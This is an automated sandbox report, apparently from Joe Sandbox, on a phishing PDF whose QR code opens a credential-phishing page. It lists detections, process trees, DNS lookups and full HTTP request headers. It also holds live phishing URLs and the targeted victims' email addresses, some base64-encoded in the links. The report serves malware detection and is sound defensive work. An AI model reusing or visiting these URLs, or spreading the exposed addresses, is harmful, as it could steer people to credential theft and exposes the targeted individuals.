
Windows Analysis Report
virus.pdf

Overview

General Information

Sample name:virus.pdf
Analysis ID:1641117
MD5:21fc9a2a54d0f2d6d678fc7d18b59822
SHA1:de0059b6c1d8f219e6a865cf93dfde46372162fd
SHA256:558ec0ecee68675ee63a5b1efc37724f76b4653e831510e1fd3fa4c598c92a4b

Detection

HTMLPhisher
Score:64
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected HtmlPhish45
AI detected landing page (webpage, office document or email)
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port

Classification

[Classification chart. Categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Scale: clean, suspicious, malicious.]
  • System is w10x64_ra
  • Acrobat.exe (PID: 6264 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\virus.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
    • AcroCEF.exe (PID: 6440 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • AcroCEF.exe (PID: 6632 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1604 --field-trial-handle=1568,i,7923655495327458657,17984682865062963080,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
  • chrome.exe (PID: 7032 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://khfreightgroup.com/awsfrvc/wsrcfwasdesf/looosafvcsfe/wafcarrfw/?email=YmpvbmVzQGxha2VsYW5kLmNjLmlsLnVz MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 5284 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1960,i,13355097746480612969,17419181852337752689,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2084 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
Source | Rule | Description | Author | Strings
dropped/chromecache_166 | JoeSecurity_HtmlPhish_45 | Yara detected HtmlPhish_45 | Joe Security |
    No Sigma rule has matched
    No Suricata rule has matched

    AV Detection

    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN?S=bjones@lakeland.cc.il.us | Avira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN/?S=bjones%40lakeland.cc.il.us | Avira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/fd9d1056-4f5113e8da6db9c7.js | Avira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/webpack-20efd41c90b5bcbd.js | Avira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/media/a34f9d1faa5f3315.p.woff2 | Avira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/app/not-found-9fcb5dc5d913bcdb.js | Avira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/23-e33e3d623cf28c17.js | Avira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/css/7b64cd318fb77179.css | Avira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/main-app-653c0408c14c4864.js | Avira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/?S=bjones@lakeland.cc.il.us | Avira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/app/page-c71772bf3bad0174.js | Avira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/chunks/92-2a0dad65b64d730c.js | Avira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/_next/static/css/f796ea3b426fcf90.css | Avira URL Cloud: Label: malware
    Source: https://sdspprfd-tftfrtrghf34f3drrs3.net/?S=jjohns@lakeland.cc.il.us | Avira URL Cloud: Label: malware

    Phishing

    Source: Yara match | File source: dropped/chromecache_166, type: DROPPED
    Source: PDF document | Joe Sandbox AI: PDF document contains QR code
    Source: 0.0..script.csv | Joe Sandbox AI: Detected suspicious JavaScript with source url: https://khfreightgroup.com/awsfrvc/wsrcfwasdesf/lo... This script demonstrates several high-risk behaviors, including the use of dynamic code execution (via `decodeEmail` function), data exfiltration (sending the decoded email to an untrusted domain), and the use of an obfuscated URL. The combination of these factors, along with the suspicious redirect to an unknown domain, indicates a high likelihood of malicious intent.
    Source: unknown | HTTPS traffic detected: 192.185.25.215:443 -> 192.168.2.16:49697 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 192.185.25.215:443 -> 192.168.2.16:49700 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 192.185.25.215:443 -> 192.168.2.16:49702 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 192.185.25.215:443 -> 192.168.2.16:49710 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.16:49712 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.16:49711 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49715 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49723 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 142.250.185.196:443 -> 192.168.2.16:49722 version: TLS 1.2
    Source: chrome.exe | Memory has grown: Private usage: 17MB later: 37MB
    Source: global traffic | TCP traffic: 192.168.2.16:49740 -> 1.1.1.1:53
    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknown | TCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.185.195
    Source: unknown | TCP traffic detected without corresponding DNS query: 2.23.227.208
    Source: unknown | TCP traffic detected without corresponding DNS query: 52.182.143.211
    Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /awsfrvc/wsrcfwasdesf/looosafvcsfe/wafcarrfw/?email=YmpvbmVzQGxha2VsYW5kLmNjLmlsLnVz HTTP/1.1Host: khfreightgroup.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /awsfrvc/wsrcfwasdesf/looosafvcsfe/wafcarrfw/?email=YmpvbmVzQGxha2VsYW5kLmNjLmlsLnVz HTTP/1.1Host: khfreightgroup.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://khfreightgroup.com/awsfrvc/wsrcfwasdesf/looosafvcsfe/wafcarrfw/?email=YmpvbmVzQGxha2VsYW5kLmNjLmlsLnVzAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: khfreightgroup.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://khfreightgroup.com/awsfrvc/wsrcfwasdesf/looosafvcsfe/wafcarrfw/?email=YmpvbmVzQGxha2VsYW5kLmNjLmlsLnVzAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/05/cropped-KH-Freight-Icon-32x32.png HTTP/1.1Host: khfreightgroup.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://khfreightgroup.com/awsfrvc/wsrcfwasdesf/looosafvcsfe/wafcarrfw/?email=YmpvbmVzQGxha2VsYW5kLmNjLmlsLnVzAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/05/cropped-KH-Freight-Icon-32x32.png HTTP/1.1Host: khfreightgroup.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /lq3uzfH9rN?S=bjones@lakeland.cc.il.us HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://khfreightgroup.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /lq3uzfH9rN/?S=bjones%40lakeland.cc.il.us HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://khfreightgroup.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/css/7b64cd318fb77179.css HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN/?S=bjones%40lakeland.cc.il.usAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/media/a34f9d1faa5f3315.p.woff2 HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-aliveOrigin: https://sdspprfd-tftfrtrghf34f3drrs3.netsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN/?S=bjones%40lakeland.cc.il.usAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-20efd41c90b5bcbd.js HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN/?S=bjones%40lakeland.cc.il.usAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/fd9d1056-4f5113e8da6db9c7.js HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN/?S=bjones%40lakeland.cc.il.usAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/23-e33e3d623cf28c17.js HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN/?S=bjones%40lakeland.cc.il.usAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/main-app-653c0408c14c4864.js HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN/?S=bjones%40lakeland.cc.il.usAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/app/not-found-9fcb5dc5d913bcdb.js HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN/?S=bjones%40lakeland.cc.il.usAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Microsoft-CryptoAPI/10.0Host: x1.i.lencr.org
    Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
    Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
    Source: global trafficHTTP traffic detected: GET /?S=bjones@lakeland.cc.il.us HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://sdspprfd-tftfrtrghf34f3drrs3.net/lq3uzfH9rN/?S=bjones%40lakeland.cc.il.usAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/css/f796ea3b426fcf90.css HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://sdspprfd-tftfrtrghf34f3drrs3.net/?S=bjones@lakeland.cc.il.usAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/92-2a0dad65b64d730c.js HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sdspprfd-tftfrtrghf34f3drrs3.net/?S=bjones@lakeland.cc.il.usAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /_next/static/chunks/app/page-c71772bf3bad0174.js HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://sdspprfd-tftfrtrghf34f3drrs3.net/?S=bjones@lakeland.cc.il.usAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /?S=jjohns@lakeland.cc.il.us HTTP/1.1Host: sdspprfd-tftfrtrghf34f3drrs3.netConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global traffic | DNS traffic detected: DNS query: khfreightgroup.com
    Source: global traffic | DNS traffic detected: DNS query: sdspprfd-tftfrtrghf34f3drrs3.net
    Source: global traffic | DNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global traffic | DNS traffic detected: DNS query: www.google.com
    Source: global traffic | DNS traffic detected: DNS query: x1.i.lencr.org
    Source: unknownHTTP traffic detected: POST /report/v4?s=Kka7siyfKKzh0DHyAAs5LLTT2aN7pS%2Bqrfw55tzojkxRCne0dyUrgcHj8QX6HpmOaB4%2FywnN39pt%2FyFZv335nnPj7C%2Fg3qvccqv3frvp99GFev5vl%2FNF0TpkY1svgF06d8Subml9hCqNAuueHB0E53zEzw%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 467Content-Type: application/reports+jsonOrigin: https://sdspprfd-tftfrtrghf34f3drrs3.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 01:17:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, max-age=0, must-revalidatevary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Accept-Encodinglink: </_next/static/media/a34f9d1faa5f3315.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2"x-powered-by: Next.jscf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kka7siyfKKzh0DHyAAs5LLTT2aN7pS%2Bqrfw55tzojkxRCne0dyUrgcHj8QX6HpmOaB4%2FywnN39pt%2FyFZv335nnPj7C%2Fg3qvccqv3frvp99GFev5vl%2FNF0TpkY1svgF06d8Subml9hCqNAuueHB0E53zEzw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9220e4903c29440e-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2691&min_rtt=1705&rtt_var=1343&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3096&recv_bytes=1318&delivery_rate=2568914&cwnd=216&unsent_bytes=0&cid=ec09375f3d8c0594&ts=759&x=0"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Windows\SystemTemp\scoped_dir7032_223180313
    Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File deleted: C:\Windows\SystemTemp\scoped_dir7032_223180313
    Source: classification engine | Classification label: mal64.phis.winPDF@36/54@11/179
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | File created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.6356
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-03-17 21-17-47-465.log
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\virus.pdf"
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1604 --field-trial-handle=1568,i,7923655495327458657,17984682865062963080,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://khfreightgroup.com/awsfrvc/wsrcfwasdesf/looosafvcsfe/wafcarrfw/?email=YmpvbmVzQGxha2VsYW5kLmNjLmlsLnVz
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1960,i,13355097746480612969,17419181852337752689,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2084 /prefetch:3
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknown
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: virus.pdfInitial sample: PDF keyword /JS count = 0
    Source: virus.pdfInitial sample: PDF keyword /JavaScript count = 0
    Source: virus.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
